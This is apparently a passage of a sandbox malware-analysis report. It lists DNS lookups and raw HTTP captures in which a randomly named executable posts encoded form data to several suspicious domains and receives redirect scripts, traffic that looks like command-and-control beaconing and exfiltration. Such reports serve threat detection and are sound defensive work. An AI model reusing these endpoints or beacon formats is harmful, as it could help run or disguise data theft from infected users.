                                                          Nov 5, 2024 15:43:08.440668106 CET1.1.1.1192.168.2.40x3ac2No error (0)ninesquare.games15.197.148.33A (IP address)IN (0x0001)false
                                                          Nov 5, 2024 15:43:36.966566086 CET1.1.1.1192.168.2.40x7924No error (0)www.s9gzg9.vips9gzg9.vipCNAME (Canonical name)IN (0x0001)false
                                                          Nov 5, 2024 15:43:36.966566086 CET1.1.1.1192.168.2.40x7924No error (0)s9gzg9.vip3.33.130.190A (IP address)IN (0x0001)false
                                                          Nov 5, 2024 15:43:36.966566086 CET1.1.1.1192.168.2.40x7924No error (0)s9gzg9.vip15.197.148.33A (IP address)IN (0x0001)false
                                                          Nov 5, 2024 15:43:50.313757896 CET1.1.1.1192.168.2.40xbcacNo error (0)www.030002832.xyz161.97.142.144A (IP address)IN (0x0001)false
                                                          Nov 5, 2024 15:44:03.967772007 CET1.1.1.1192.168.2.40x7fd3No error (0)www.meliorahomes.net8.217.17.192A (IP address)IN (0x0001)false
                                                          Nov 5, 2024 15:44:18.882421017 CET1.1.1.1192.168.2.40xd817No error (0)www.bdipjg.asia78.141.202.204A (IP address)IN (0x0001)false
                                                          Nov 5, 2024 15:44:32.868058920 CET1.1.1.1192.168.2.40x34bfNo error (0)www.sortcy.top184.94.215.26A (IP address)IN (0x0001)false
                                                          Nov 5, 2024 15:44:47.409607887 CET1.1.1.1192.168.2.40xbd1bNo error (0)www.bearableguy.netbearableguy.netCNAME (Canonical name)IN (0x0001)false
                                                          Nov 5, 2024 15:44:47.409607887 CET1.1.1.1192.168.2.40xbd1bNo error (0)bearableguy.net3.33.130.190A (IP address)IN (0x0001)false
                                                          Nov 5, 2024 15:44:47.409607887 CET1.1.1.1192.168.2.40xbd1bNo error (0)bearableguy.net15.197.148.33A (IP address)IN (0x0001)false

                                                          HTTP Request Dependency Graph

                                                          • www.it2sp8.vip
                                                          • www.bandukchi.com
                                                          • www.onlineblikje.online
                                                          • www.ninesquare.games
                                                          • www.s9gzg9.vip
                                                          • www.030002832.xyz
                                                          • www.meliorahomes.net
                                                          • www.bdipjg.asia
                                                          • www.sortcy.top
                                                          • www.bearableguy.net

                                                          HTTP Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.4497363.33.130.190802816C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 5, 2024 15:42:21.044989109 CET445OUTGET /r1bk/?H0kxIVc=yDxWd0BQEE2xW+d30AjHvTjkfNCptZ8W4Q8iivRSkmBvD/jrOo7hTp1c5kyDuCDLc7U+VDeOvWVRbtchKio2461hrTCe68AibWCqyGiIKQvuKq+py71Z7uY=&Ot=J0UP4Hshc HTTP/1.1
                                                          Host: www.it2sp8.vip
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                          Nov 5, 2024 15:42:24.712698936 CET396INHTTP/1.1 200 OK
                                                          Server: openresty
                                                          Date: Tue, 05 Nov 2024 14:42:24 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 256
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 48 30 6b 78 49 56 63 3d 79 44 78 57 64 30 42 51 45 45 32 78 57 2b 64 33 30 41 6a 48 76 54 6a 6b 66 4e 43 70 74 5a 38 57 34 51 38 69 69 76 52 53 6b 6d 42 76 44 2f 6a 72 4f 6f 37 68 54 70 31 63 35 6b 79 44 75 43 44 4c 63 37 55 2b 56 44 65 4f 76 57 56 52 62 74 63 68 4b 69 6f 32 34 36 31 68 72 54 43 65 36 38 41 69 62 57 43 71 79 47 69 49 4b 51 76 75 4b 71 2b 70 79 37 31 5a 37 75 59 3d 26 4f 74 3d 4a 30 55 50 34 48 73 68 63 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?H0kxIVc=yDxWd0BQEE2xW+d30AjHvTjkfNCptZ8W4Q8iivRSkmBvD/jrOo7hTp1c5kyDuCDLc7U+VDeOvWVRbtchKio2461hrTCe68AibWCqyGiIKQvuKq+py71Z7uY=&Ot=J0UP4Hshc"}</script></head></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          1192.168.2.4497373.33.130.190802816C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 5, 2024 15:42:39.994965076 CET718OUTPOST /5lco/ HTTP/1.1
                                                          Host: www.bandukchi.com
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Origin: http://www.bandukchi.com
                                                          Referer: http://www.bandukchi.com/5lco/
                                                          Cache-Control: max-age=0
                                                          Content-Length: 204
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                          Data Raw: 48 30 6b 78 49 56 63 3d 50 74 2b 2b 6b 41 68 42 43 54 70 51 79 76 65 46 63 4b 69 79 57 38 66 36 31 30 62 30 6f 71 64 4d 6b 5a 6e 55 59 75 6e 2b 63 75 57 6b 79 79 58 5a 37 52 39 76 62 63 44 39 66 75 72 4e 2b 70 39 78 41 44 74 68 43 79 47 33 34 46 32 42 4c 6f 41 7a 69 69 4a 34 51 70 33 35 6e 42 67 56 54 35 4d 47 2b 38 53 36 38 47 4b 44 4c 79 57 30 33 6c 6a 34 33 77 72 4d 2b 52 31 65 76 6b 38 51 47 36 44 4c 33 64 36 41 61 37 76 36 2b 6a 4a 51 35 49 53 6f 7a 64 76 38 7a 59 57 77 46 74 61 2f 4c 69 4b 44 6b 61 6f 74 4c 30 4f 43 38 55 76 42 72 74 52 51 48 76 4e 6e 36 4d 61 48 66 58 65 74 65 66 57 32 35 51 3d 3d
                                                          Data Ascii: H0kxIVc=Pt++kAhBCTpQyveFcKiyW8f610b0oqdMkZnUYun+cuWkyyXZ7R9vbcD9furN+p9xADthCyG34F2BLoAziiJ4Qp35nBgVT5MG+8S68GKDLyW03lj43wrM+R1evk8QG6DL3d6Aa7v6+jJQ5ISozdv8zYWwFta/LiKDkaotL0OC8UvBrtRQHvNn6MaHfXetefW25Q==


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          2192.168.2.4497383.33.130.190802816C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 5, 2024 15:42:42.547991991 CET738OUTPOST /5lco/ HTTP/1.1
                                                          Host: www.bandukchi.com
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Origin: http://www.bandukchi.com
                                                          Referer: http://www.bandukchi.com/5lco/
                                                          Cache-Control: max-age=0
                                                          Content-Length: 224
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                          Data Raw: 48 30 6b 78 49 56 63 3d 50 74 2b 2b 6b 41 68 42 43 54 70 51 77 50 4f 46 51 4a 36 79 51 63 66 39 36 55 62 30 2b 61 64 49 6b 5a 37 55 59 72 57 6a 66 63 43 6b 79 54 6e 5a 36 55 64 76 59 63 44 39 4c 2b 72 4d 68 35 39 75 41 44 52 70 43 33 6d 33 34 46 69 42 4c 73 4d 7a 69 54 4a 2f 52 35 33 37 2b 52 67 62 63 5a 4d 47 2b 38 53 36 38 43 69 6c 4c 79 65 30 32 57 37 34 78 52 72 50 68 68 31 64 6f 6b 38 51 43 36 44 51 33 64 37 6e 61 2f 75 56 2b 67 78 51 35 4d 61 6f 7a 4d 76 2f 67 34 57 79 42 74 61 72 44 57 54 4b 74 70 56 46 57 43 53 63 6a 56 6a 41 75 72 41 4b 57 65 73 77 6f 4d 2b 30 43 51 58 5a 54 63 72 2f 69 51 4d 70 72 79 65 67 70 51 41 59 44 63 36 6a 50 47 75 38 45 72 38 3d
                                                          Data Ascii: H0kxIVc=Pt++kAhBCTpQwPOFQJ6yQcf96Ub0+adIkZ7UYrWjfcCkyTnZ6UdvYcD9L+rMh59uADRpC3m34FiBLsMziTJ/R537+RgbcZMG+8S68CilLye02W74xRrPhh1dok8QC6DQ3d7na/uV+gxQ5MaozMv/g4WyBtarDWTKtpVFWCScjVjAurAKWeswoM+0CQXZTcr/iQMpryegpQAYDc6jPGu8Er8=


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          3192.168.2.4497393.33.130.190802816C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 5, 2024 15:42:45.096685886 CET10820OUTPOST /5lco/ HTTP/1.1
                                                          Host: www.bandukchi.com
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Origin: http://www.bandukchi.com
                                                          Referer: http://www.bandukchi.com/5lco/
                                                          Cache-Control: max-age=0
                                                          Content-Length: 10304
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                          Data Raw: 48 30 6b 78 49 56 63 3d 50 74 2b 2b 6b 41 68 42 43 54 70 51 77 50 4f 46 51 4a 36 79 51 63 66 39 36 55 62 30 2b 61 64 49 6b 5a 37 55 59 72 57 6a 66 63 61 6b 79 68 2f 5a 37 31 64 76 5a 63 44 39 55 4f 72 4a 68 35 38 30 41 48 39 74 43 33 36 4a 34 48 61 42 4e 2f 45 7a 71 48 56 2f 49 70 33 37 78 78 67 61 54 35 4d 54 2b 38 69 2b 38 47 4f 6c 4c 79 65 30 32 51 58 34 79 41 72 50 36 68 31 65 76 6b 39 43 47 36 43 2f 33 63 53 59 61 2f 36 2f 2b 51 52 51 34 74 6d 6f 78 36 37 2f 6a 59 57 38 47 74 62 73 44 54 4c 4a 74 70 5a 6e 57 43 4f 36 6a 56 6e 41 6a 73 46 4a 44 64 49 57 39 38 36 74 61 42 72 2f 54 74 37 42 74 53 4a 57 67 6a 57 48 71 6c 68 32 47 4d 76 31 53 47 61 5a 53 4e 48 4c 43 32 42 4f 79 45 51 38 6a 61 4c 62 7a 48 56 79 43 2f 39 7a 7a 56 36 37 62 63 70 5a 39 74 64 36 5a 58 2b 6c 4f 6d 49 53 41 6f 53 37 72 73 4f 35 62 5a 55 79 33 31 69 52 50 6a 48 7a 38 6f 5a 36 77 43 66 59 6d 58 42 67 6c 75 6f 4f 42 47 65 54 53 7a 77 5a 4a 52 31 6f 4a 57 64 36 62 4b 58 78 30 6f 49 52 42 6e 33 45 5a 6d 69 51 67 63 5a 5a 65 54 [TRUNCATED]
                                                          Data Ascii: H0kxIVc=Pt++kAhBCTpQwPOFQJ6yQcf96Ub0+adIkZ7UYrWjfcakyh/Z71dvZcD9UOrJh580AH9tC36J4HaBN/EzqHV/Ip37xxgaT5MT+8i+8GOlLye02QX4yArP6h1evk9CG6C/3cSYa/6/+QRQ4tmox67/jYW8GtbsDTLJtpZnWCO6jVnAjsFJDdIW986taBr/Tt7BtSJWgjWHqlh2GMv1SGaZSNHLC2BOyEQ8jaLbzHVyC/9zzV67bcpZ9td6ZX+lOmISAoS7rsO5bZUy31iRPjHz8oZ6wCfYmXBgluoOBGeTSzwZJR1oJWd6bKXx0oIRBn3EZmiQgcZZeTwKdcCwdaU+x1PPG5za7iqnj/Huv+5KmZ7itC8w/iO4qhqAMSBi/J0QQT7XfkL+iMoTo7/tABP68yCHW2+W9ug8bTklvZZqhIKACew3xioAbf5q9QOpviQgqMU3grTNXg7OLSFNjHN6BGAFPpOhkRveoUOGWLaWIZisK5SqIX2jtSsQzfEgX6qJv0RAm/sAQSFa01XJ75iJ8p0ruqf35ICU8XkhrUO1lpXjmFdJ7i2CrGEbcG1T2c0YCre7uoIDGalFT01kXhVO3Gku5/vclLjMbu0ripxkByFteKegW8VenbwvGRnrYXXGlK+wUo9Db2gVfLiUrWmSLwPqY/z5O4w+eWM0TVhiznTs/pcekNf+9ap200rrVt4/2NWAcuRknCeTy/zWbD5ygg8HO/uwzTUH8E4+5Qxixa8x/lDD3rxvUcY3ZrsxqV3gnwyQiSeNbVMnjUAX4F0Fv63pIp9W9JE/YcxfxHkg46DKK1wa5pVnQeebsTHo3TQbF6zjU7lHRFvmFLz4ksttX8NX4rLrIe9goxB3LaON6uQa5jaXALmnsK/CBQtXE4KaxANmFHpiD/ejgHHmuIpi546pqTaQhHWHimhPsXZ+mfL+kJS35W0/RpY7p5QfGBQ+Tci2YH3/ZDPH3l6xbhIf3GcpBaR/vU/ajr3Co/ZZZBjQ [TRUNCATED]


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          4192.168.2.4497423.33.130.190802816C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 5, 2024 15:42:47.645574093 CET448OUTGET /5lco/?H0kxIVc=CvWen2QyFQx61qXZcJ6WaNLV8x6X7ZVzg6r8Qqi7af+RkACh3mo/Ys7mcuj5lMFPExxzGnawwjipItEZ43N8KIbGnzAFfsAX8PL843K3MC6R2n7AiDX71Bw=&Ot=J0UP4Hshc HTTP/1.1
                                                          Host: www.bandukchi.com
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                          Nov 5, 2024 15:42:48.264712095 CET396INHTTP/1.1 200 OK
                                                          Server: openresty
                                                          Date: Tue, 05 Nov 2024 14:42:48 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 256
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 48 30 6b 78 49 56 63 3d 43 76 57 65 6e 32 51 79 46 51 78 36 31 71 58 5a 63 4a 36 57 61 4e 4c 56 38 78 36 58 37 5a 56 7a 67 36 72 38 51 71 69 37 61 66 2b 52 6b 41 43 68 33 6d 6f 2f 59 73 37 6d 63 75 6a 35 6c 4d 46 50 45 78 78 7a 47 6e 61 77 77 6a 69 70 49 74 45 5a 34 33 4e 38 4b 49 62 47 6e 7a 41 46 66 73 41 58 38 50 4c 38 34 33 4b 33 4d 43 36 52 32 6e 37 41 69 44 58 37 31 42 77 3d 26 4f 74 3d 4a 30 55 50 34 48 73 68 63 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?H0kxIVc=CvWen2QyFQx61qXZcJ6WaNLV8x6X7ZVzg6r8Qqi7af+RkACh3mo/Ys7mcuj5lMFPExxzGnawwjipItEZ43N8KIbGnzAFfsAX8PL843K3MC6R2n7AiDX71Bw=&Ot=J0UP4Hshc"}</script></head></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          5192.168.2.449772213.249.67.10802816C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 5, 2024 15:42:53.362118959 CET736OUTPOST /qmow/ HTTP/1.1
                                                          Host: www.onlineblikje.online
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Origin: http://www.onlineblikje.online
                                                          Referer: http://www.onlineblikje.online/qmow/
                                                          Cache-Control: max-age=0
                                                          Content-Length: 204
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                          Data Raw: 48 30 6b 78 49 56 63 3d 71 59 63 71 42 71 76 63 77 47 57 54 43 68 76 5a 54 66 4b 6b 55 37 79 6c 63 44 54 6f 68 51 64 61 67 6b 47 38 72 62 36 57 51 35 77 44 4e 48 71 67 56 53 53 79 4a 54 68 70 36 6c 78 77 4c 77 41 58 32 50 77 46 41 7a 6a 75 43 65 74 32 6d 6c 55 39 59 45 52 2b 31 43 32 78 63 72 57 31 76 38 38 66 47 7a 67 6a 32 77 67 59 59 65 38 55 56 4a 4c 35 71 47 47 62 62 6a 6d 2b 6f 74 53 4b 61 6c 6d 46 4a 67 6a 74 2f 2f 47 69 36 55 64 78 74 56 31 31 6b 68 61 46 34 4e 57 6b 41 69 48 6f 65 71 4b 73 42 59 48 69 6c 42 4e 7a 56 51 6b 58 44 66 54 50 72 63 6c 30 38 67 56 57 62 4c 73 59 46 36 71 30 67 77 3d 3d
                                                          Data Ascii: H0kxIVc=qYcqBqvcwGWTChvZTfKkU7ylcDTohQdagkG8rb6WQ5wDNHqgVSSyJThp6lxwLwAX2PwFAzjuCet2mlU9YER+1C2xcrW1v88fGzgj2wgYYe8UVJL5qGGbbjm+otSKalmFJgjt//Gi6UdxtV11khaF4NWkAiHoeqKsBYHilBNzVQkXDfTPrcl08gVWbLsYF6q0gw==
                                                          Nov 5, 2024 15:42:54.203351974 CET206INHTTP/1.1 302 Found
                                                          Date: Tue, 05 Nov 2024 14:42:54 GMT
                                                          Server: Apache/2.4.56 (Debian)
                                                          Location: https://onlineblikjes.nl/
                                                          Content-Length: 0
                                                          Connection: close
                                                          Content-Type: text/html; charset=UTF-8


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          6192.168.2.449783213.249.67.10802816C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 5, 2024 15:42:56.219734907 CET756OUTPOST /qmow/ HTTP/1.1
                                                          Host: www.onlineblikje.online
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Origin: http://www.onlineblikje.online
                                                          Referer: http://www.onlineblikje.online/qmow/
                                                          Cache-Control: max-age=0
                                                          Content-Length: 224
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                          Data Raw: 48 30 6b 78 49 56 63 3d 71 59 63 71 42 71 76 63 77 47 57 54 59 42 7a 5a 52 38 79 6b 46 72 79 71 5a 44 54 6f 76 77 64 65 67 6c 36 38 72 5a 57 47 51 4c 6b 44 4e 6e 36 67 55 54 53 79 5a 44 68 70 79 46 78 31 57 67 41 69 32 50 39 6c 41 79 76 75 43 59 42 32 6d 67 6f 39 5a 33 70 35 7a 53 32 7a 46 62 57 33 77 4d 38 66 47 7a 67 6a 32 78 45 69 59 65 55 55 56 39 50 35 6c 48 47 61 46 54 6d 39 69 4e 53 4b 65 6c 6d 42 4a 67 6a 66 2f 39 79 49 36 52 42 78 74 55 46 31 6c 7a 79 43 78 4e 57 6d 64 79 47 2b 53 35 54 56 44 70 4f 66 6b 7a 74 48 65 69 34 50 50 35 43 56 36 74 45 6a 75 67 78 6c 47 4d 6c 73 49 35 58 39 37 35 41 38 42 4f 7a 37 5a 41 34 6d 79 30 63 6b 38 6a 56 42 79 41 73 3d
                                                          Data Ascii: H0kxIVc=qYcqBqvcwGWTYBzZR8ykFryqZDTovwdegl68rZWGQLkDNn6gUTSyZDhpyFx1WgAi2P9lAyvuCYB2mgo9Z3p5zS2zFbW3wM8fGzgj2xEiYeUUV9P5lHGaFTm9iNSKelmBJgjf/9yI6RBxtUF1lzyCxNWmdyG+S5TVDpOfkztHei4PP5CV6tEjugxlGMlsI5X975A8BOz7ZA4my0ck8jVByAs=
                                                          Nov 5, 2024 15:42:57.095061064 CET206INHTTP/1.1 302 Found
                                                          Date: Tue, 05 Nov 2024 14:42:56 GMT
                                                          Server: Apache/2.4.56 (Debian)
                                                          Location: https://onlineblikjes.nl/
                                                          Content-Length: 0
                                                          Connection: close
                                                          Content-Type: text/html; charset=UTF-8


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          7192.168.2.449798213.249.67.10802816C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 5, 2024 15:42:58.768121958 CET10838OUTPOST /qmow/ HTTP/1.1
                                                          Host: www.onlineblikje.online
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Origin: http://www.onlineblikje.online
                                                          Referer: http://www.onlineblikje.online/qmow/
                                                          Cache-Control: max-age=0
                                                          Content-Length: 10304
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                          Data Raw: 48 30 6b 78 49 56 63 3d 71 59 63 71 42 71 76 63 77 47 57 54 59 42 7a 5a 52 38 79 6b 46 72 79 71 5a 44 54 6f 76 77 64 65 67 6c 36 38 72 5a 57 47 51 4c 38 44 4f 55 69 67 56 77 71 79 61 44 68 70 34 6c 78 30 57 67 41 2f 32 50 56 70 41 79 7a 59 43 62 31 32 6b 46 6b 39 4a 57 70 35 39 53 32 7a 59 72 57 30 76 38 38 77 47 7a 78 72 32 77 30 69 59 65 55 55 56 38 2f 35 68 57 47 61 48 54 6d 2b 6f 74 53 38 61 6c 6d 70 4a 6a 54 6c 2f 39 32 79 37 69 5a 78 74 30 56 31 6d 41 61 43 73 39 57 67 63 79 47 32 53 35 76 30 44 74 6e 7a 6b 33 6b 53 65 67 6b 50 4d 74 2f 4e 68 2f 4e 2f 39 43 5a 68 5a 65 70 4b 50 5a 58 36 69 61 77 77 47 62 72 4f 4f 79 45 55 70 57 68 66 73 42 4a 56 78 6e 61 70 33 37 63 4a 6e 74 45 31 69 42 50 34 5a 2b 67 47 46 42 44 62 45 48 4e 52 4c 79 30 69 54 61 53 30 35 72 42 49 54 32 6a 4f 56 77 77 33 4e 70 49 4e 6f 34 46 57 46 37 5a 45 53 45 38 32 79 37 4a 51 34 39 55 4c 42 70 34 36 6e 6f 4f 58 39 2f 65 31 56 48 6c 6a 43 38 61 7a 54 39 72 76 58 37 6b 65 2f 66 32 44 47 63 6c 33 4e 67 76 39 49 42 73 42 47 33 [TRUNCATED]
                                                          Data Ascii: H0kxIVc=qYcqBqvcwGWTYBzZR8ykFryqZDTovwdegl68rZWGQL8DOUigVwqyaDhp4lx0WgA/2PVpAyzYCb12kFk9JWp59S2zYrW0v88wGzxr2w0iYeUUV8/5hWGaHTm+otS8almpJjTl/92y7iZxt0V1mAaCs9WgcyG2S5v0Dtnzk3kSegkPMt/Nh/N/9CZhZepKPZX6iawwGbrOOyEUpWhfsBJVxnap37cJntE1iBP4Z+gGFBDbEHNRLy0iTaS05rBIT2jOVww3NpINo4FWF7ZESE82y7JQ49ULBp46noOX9/e1VHljC8azT9rvX7ke/f2DGcl3Ngv9IBsBG3qVTqm/apWoxsqn6NHhDECIHtxL+pCuJqw22SAlE0eHhUzFOZ09sSksSExO2GFnlqeISSoIip0Kb4lxURWUYXlzQ6custQSUULiz8QOre9Va3wUUCgPrjkGNtTYm8FX6Y4XAmp+nG/nvCXC7MlG3N4ttss1tgTH2yl60vmBLCCqvcEoR1Nbcxwst8mLXyb5wmIDedr7VxD/xCaAY4ToXYHgdMJjQinrILKiFg8HCXIANfE2OB7KdYRX8P13T4g3fmbrexMVy6KdRwM1vd4m4sHOyj0yDjWuX2K4GMkLly56h/GEAKYJ6hed46ObZ1b46s9m0qEUu6BAAZxbu2Zu8k6ANyhV4Mkktzf7x3v+op7aZmQYGg8qQzSsYWDG5NbaqeIgWGhw4oeOJBpVjcavnIBG5k6J0N0nAuOzB8fXJ/aM+IQ69RDCw5yBq4tSZQ2xsxUQbf4IG8FSqEMbeqUrooviwfGVt3S6uE8onhWQm5PLmkc17dKFdkge5Otfj95zxa5pDQurd9mgfZNYa8SLhxT4ODSPOYJBVNaArEYRc+WNGg5mFfJmtEQR4Kqp4m8tKF7SLvxFpS4MpkAOmSAheNboQi8udYCkfgng702RFN2GAYO48n5bBqk7G7IdtU0XnIpuzZ3ylvL96MMjx3C2cV5EX7TBZs4EYaf1 [TRUNCATED]
                                                          Nov 5, 2024 15:42:59.606549978 CET206INHTTP/1.1 302 Found
                                                          Date: Tue, 05 Nov 2024 14:42:59 GMT
                                                          Server: Apache/2.4.56 (Debian)
                                                          Location: https://onlineblikjes.nl/
                                                          Content-Length: 0
                                                          Connection: close
                                                          Content-Type: text/html; charset=UTF-8


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          8192.168.2.449814213.249.67.10802816C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 5, 2024 15:43:01.405841112 CET454OUTGET /qmow/?H0kxIVc=na0KCebXsUeEcQbjI8C3RJS2SBGfuD1cmXaEpqyofp4hZXm4YCiWGFly0HVDOhs56sJdVgPDJehM8FklOw5CghWrF+7Yka4QOwdp8ykVOcUPZunN9V/VPgg=&Ot=J0UP4Hshc HTTP/1.1
                                                          Host: www.onlineblikje.online
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                          Nov 5, 2024 15:43:03.202363968 CET348INHTTP/1.1 302 Found
                                                          Date: Tue, 05 Nov 2024 14:43:03 GMT
                                                          Server: Apache/2.4.56 (Debian)
                                                          Location: https://onlineblikjes.nl/?H0kxIVc=na0KCebXsUeEcQbjI8C3RJS2SBGfuD1cmXaEpqyofp4hZXm4YCiWGFly0HVDOhs56sJdVgPDJehM8FklOw5CghWrF+7Yka4QOwdp8ykVOcUPZunN9V/VPgg=&Ot=J0UP4Hshc
                                                          Content-Length: 0
                                                          Connection: close
                                                          Content-Type: text/html; charset=UTF-8


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          9192.168.2.4498543.33.130.190802816C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 5, 2024 15:43:08.459558964 CET727OUTPOST /4oy8/ HTTP/1.1
                                                          Host: www.ninesquare.games
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Origin: http://www.ninesquare.games
                                                          Referer: http://www.ninesquare.games/4oy8/
                                                          Cache-Control: max-age=0
                                                          Content-Length: 204
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
